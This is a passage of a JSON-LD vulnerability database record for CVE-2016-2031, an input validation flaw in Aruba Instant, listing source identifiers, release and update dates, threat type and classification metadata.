        "db": "CNNVD",
        "id": "CNNVD-201607-362"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2031"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "90207"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009614"
      },
      {
        "db": "PACKETSTORM",
        "id": "136997"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-362"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2031"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-05-06T00:00:00",
        "db": "BID",
        "id": "90207"
      },
      {
        "date": "2020-02-18T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-009614"
      },
      {
        "date": "2016-05-06T23:02:22",
        "db": "PACKETSTORM",
        "id": "136997"
      },
      {
        "date": "2016-05-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201607-362"
      },
      {
        "date": "2020-01-31T20:15:00",
        "db": "NVD",
        "id": "CVE-2016-2031"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-07-06T14:36:00",
        "db": "BID",
        "id": "90207"
      },
      {
        "date": "2020-02-18T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-009614"
      },
      {
        "date": "2020-11-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201607-362"
      },
      {
        "date": "2021-05-04T13:32:00",
        "db": "NVD",
        "id": "CVE-2016-2031"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "136997"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-362"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Aruba Instant Input verification vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009614"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-362"
      }
    ],
    "trust": 0.6
  }
}